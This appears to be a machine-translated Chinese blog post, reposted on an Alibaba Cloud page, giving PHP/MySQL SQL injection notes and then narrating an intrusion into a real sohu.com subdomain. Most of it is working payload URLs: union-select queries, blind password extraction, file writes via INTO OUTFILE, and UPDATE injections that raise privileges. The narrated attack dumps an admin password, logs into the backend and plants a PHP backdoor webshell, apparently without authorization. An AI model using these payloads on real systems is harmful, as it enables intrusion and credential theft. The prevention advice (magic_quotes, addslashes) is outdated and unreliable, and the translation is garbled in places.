SQL injection of PHP

Source: Internet
Author: User
Tags empty functions sql mysql mysql injection sql injection table name file permissions

Today I learned the basics about SQL injection from the Internet. The focus of SQL injection is to construct SQL statements, with the flexibility to use SQL

Statement to construct the injection string for the cow ratio. After learning to write a few notes, ready to use. I hope you're looking at the following content first.

The rationale for solving SQL. The code in your notes comes from the network.

= = = Base Part = = =

This table queries:

Http://127.0.0.1/injection/user.php?username=angel ' and LENGTH (password) = ' 6

Http://127.0.0.1/injection/user.php?username=angel ' and Left (password,1) = ' m

Union UNION statement:

Http://127.0.0.1/injection/show.php?id=1 ' Union select 1,username,password from user/*

Http://127.0.0.1/injection/show.php?id= ' Union select 1,username,password from user/*

Export File:

Http://127.0.0.1/injection/user.php?username=angel ' into outfile ' c:/file.txt

Http://127.0.0.1/injection/user.php?username= ' or 1=1 into outfile ' C:/file.txt

Http://127.0.0.1/injection/show.php?id= ' Union select 1,username,password from user into outfile ' c:/user.txt

Insert statement:

INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' $username ', ' $password ', ' $homepage ', ' 1 ');

Construction Homepage Value: Http://4ngel.net ', ' 3 ') #

The SQL statement becomes: INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' Angel ', ' mypass ', ' Http://4ngel '). Net ', ' 3 ') # ', ' 1 ');

UPDATE statement: I like this one.

Understand this SQL first

UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE id= ' $id '

If this SQL is modified to the following form, the injection is implemented

1: Modify the homepage value to

Http://4ngel.net ', userlevel= ' 3

The SQL statement then becomes

UPDATE user SET password= ' mypass ', homepage= ' http://4ngel.net ', userlevel= ' 3 ' WHERE id= ' $id '

Userlevel for User Level

2: Modify the password value to

Mypass) ' WHERE username= ' admin ' #

The SQL statement then becomes

UPDATE user SET password= ' MD5 (mypass) ' where username= ' admin ' #) ', homepage= ' $homepage ' where id= ' $id '

3: Modify ID value to

' OR username= ' admin '

The SQL statement then becomes

UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE id= ' OR username= ' admin '

= = = Advanced Part = = =

Common MySQL built-in functions

DATABASE ()

USER ()

System_user ()

Session_user ()

Current_User ()

Database ()

Version ()

SUBSTRING ()

MID ()

CHAR ()

Load_file ()

......

function application

UPDATE article SET title=database () WHERE id=1

Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,database (), version ()

SELECT * from user WHERE Username=char (97,110,103,101,108)

# char (97,110,103,101,108) is equivalent to Angel, decimal

Http://127.0.0.1/injection/user.php?userid=1 and Password=char (109,121,112,97,115,115) http://127.0.0.1/injection /user.php?userid=1 and Left (password,1) >char (100)

Http://127.0.0.1/injection/user.php?userid=1 and Ord (Mid (password,3,1)) >111

Determine the number and type of fields in a data structure

Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,1,1

Http://127.0.0.1/injection/show.php?id=-1 Union Select char (), char (), char (97)

Guess data table name

Http://127.0.0.1/injection/show.php?id=-1 Union select 1,1,1 from members

Cross-table queries get user names and passwords

http://127.0.0.1/ymdown/show.php?id=10000 Union Select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1

Other

#验证第一位密码

HTTP://127.0.0.1/YMDOWN/SHOW.PHP?ID=10 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 and Ord (Mid (password,1,1)) =49

= = = Injection Prevention = =

Server aspects

MAGIC_QUOTES_GPC set to On

Display_errors set to Off

Coding aspects

$keywords = Addslashes ($keywords);

$keywords = Str_replace ("_", "\_", $keywords);

$keywords = str_replace ("%", "\%", $keywords);

Numeric type

Use Intval () to catch

String type

To add a single quote in an SQL statement parameter

The following code, used to prevent injection

if (GET_MAGIC_QUOTES_GPC ()) {

//....

}else{

$str = mysql_real_escape_string ($STR);

$keywords = Str_replace ("_", "\_", $keywords);

$keywords = str_replace ("%", "\%", $keywords);

}

Useful functions

Stripslashes ()

GET_MAGIC_QUOTES_GPC ()

Mysql_real_escape_string ()

Strip_tags ()

Array_map ()

Addslashes ()

Reference Articles:

Http://www.4ngel.net/article/36.htm (SQL injection with MySQL) Chinese

http://www.phpe.net/mysql_manual/06-4.html (MySQL statement reference)

A safety test for sohu.com

has been posted on the hacker line.

Posted in Http://www.loveshell.net

Sohu.com is a relatively large portal site in the country, providing many services including mailboxes. Such a large site, no problem is difficult, as the saying goes, the more the more unsafe! Whether for the server or the site is the truth, the recent study of MySQL injection, so by the way on the sohu.com did a small security check to see that it does not exist SQL injection vulnerabilities.

Look at Sohu.com's main station found almost all static, so gave up the idea of finding problems in the main station. Directly in the sohu.com of the various points of view after browsing a circle, most of the sites are using PHP script, there are a few use JSP script, according to experience we know that the PHP system, the general background database are MySQL, as if the ASP corresponds to MSSQL, There seems to be a lot of problems in the area. Because of PHP's characteristics (PHP by default will be passed in the parameters of the ' and other characters in the conversion, so for the character type of the variable by default is difficult to inject), in general, we inject only the number of variables. According to the usual injection of knowledge, we know that id=xxx such form of the parameters are generally the number of variables, so we just go to test those php?id=xxx connection may find a loophole! Through a careful search, It really made me find a problem connection on the XXX.it.sohu.com http://XXX.it.sohu.com/book/serialize.php?id=86

Submit:

Http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*

Return to normal as shown in Figure 1.

Then submit:

Http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*

Return no information like Figure 2, empty bar, should be the result of the SQL statement is empty.

With these two URLs we can guess that the vulnerabilities exist because the and 1=1 and 1=2 we submit are executed as SQL statements! So the other statements we submit are also executable, which is SQL injection! We can also know that the ID variable is treated as a number and is not placed in the "Between, otherwise we cannot succeed!" If the variable does not filter the SQL other keywords, we are likely to succeed! I met a lot of things are variable filter select, in MySQL is dead end, good depressed!

Now that the loophole is there, let's go on! The first of course is to probe the type of database and the account that connects the database! High privilege and database and web-like machine words can exempt guessing fields from the pain! Submit:

Http://XXX.it.sohu.com/book/serialize.php?id=86 and Ord (Mid (Version (), 1,1)) >51/*

Return to normal as shown in Figure 3, this statement is to see the version of the database is not higher than 3, because 3 of the ASCII is 51! Version of the first character is greater than 51 of course is more than 4.0! More than 4.0 is to support the union query, so that you can avoid a guess of the pain Oh! Here it turns out to be true, So the database is more than 4.0 oh, can support the union.

Since the support of the union query first of all the fields of this statement to burst out bar! Later, we'll use union to inquire what is very fast! Submit:

http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 10/*

Return to normal as shown in Figure 4, it appears that the field is greater than 10, continue to submit:

http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 20/*

Normal return, submit:

http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 30/*

......

By 50 when the order returned no information! appears to be greater than 40 of less than 50, and then commits:

http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 45/*

......

Finally guessed that the field is about 41! This is because some of the fields are not sorted, so we also need to use Union to accurately locate the field number is 41, submitted:

HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 /*

Return the results as shown in Figure 5, haha, success Oh! Which fields will be displayed on the page is also clear! Now let's move on! Submit:

HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

Return the results as shown in Figure 6, complete the database system detection Oh! We are probably not root, and the database server and Web are probably not on a single server, so we don't have file permissions! Submit:

Http://XXX.it.sohu.com/book/serialize.php?id=86 and (select COUNT (*) from Mysql.user) >0/*

Return results like Figure 7, there is no read access to MySQL, more certain permissions is not root!

Since it is not root, do not be discouraged, let us continue! In further guessing the data before we had better find the background first, many times found the administrator password but can not find a place to land, very depressed said! In the root directory plus/admin and/manage/and so on the background commonly used addresses are returned 404 error, Guess a few times finally in the/book/directory admin when the 403 forbiden error, haha, there is this directory! But the landing page anyway also guess not to come out, depressed in! But since you know there is a admin or say, go to Google search:

Admin site:sohu.com

As shown in Figure 8, got another point of the forum, we know that people are very lazy, usually a local background features are probably the characteristics of the entire site, so when I try to visit the/book/admin/admuser.php Miracle appeared, such as Figure 9, Haha, from the success of more near Oh! Here we know the background of the site, in fact, we can also get very important information, see the original file to find the name of the landing form is name and password, it is easy to infer the other side of the administrator table structure, even if not in line with the estimate is similar, hehe! So you know why we have to guess backstage first! Go ahead and inject it! Submit:

HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*

Returns an error stating that there is no admin for this table, try admins and admin_user, and so on, and finally submit:

HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*

Time to return to success, haha! There is user this table! What about the admin table? continue to submit:

HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,name, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 From user/*

Error returning empty information, submitting:

HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,password, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 From user/*

Return the results as shown in Figure 10, haha normal return and out of a password, should be the first user password in the admin table! Then what is his user name? Guess many fields are returned errors, there is no way to enter an ID, incredibly return success! ID is the name of the administrator Oh! Submit:

HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,password,3,4,id, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*

Return the results as shown in Figure 11, haha, get the name of the administrator Oh! Excited to take the administrator name and password to the backstage landing success Oh! As shown in Figure 12. Now is to think about how to take Webshell time, in the background found that there are upload pictures, but when uploading php file when prompted to say is not a picture file, depressed! In the background of a careful messy turn over will, found a PHP file to create the function, so in the inside inserted a word of PHP back door , as shown in Figure 13, after the point generated prompt success, it seems that if there is no filtration we should be Webshell, the password is a, with a word of the back door connected to the figure 14, haha, success! Script detection to this successful completion!

After getting Webshell I looked on the server, found that the security of the server is done well, do not execute the command, and basically all the directories except the directory we just uploaded are not writable, but as a script test, get Webshell also even if successful! It can also be seen that A small parameter without filtering can lead to the fall of the site, especially such as sohu.com, more parameters, more attention should be paid to filter the problem Oh!



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.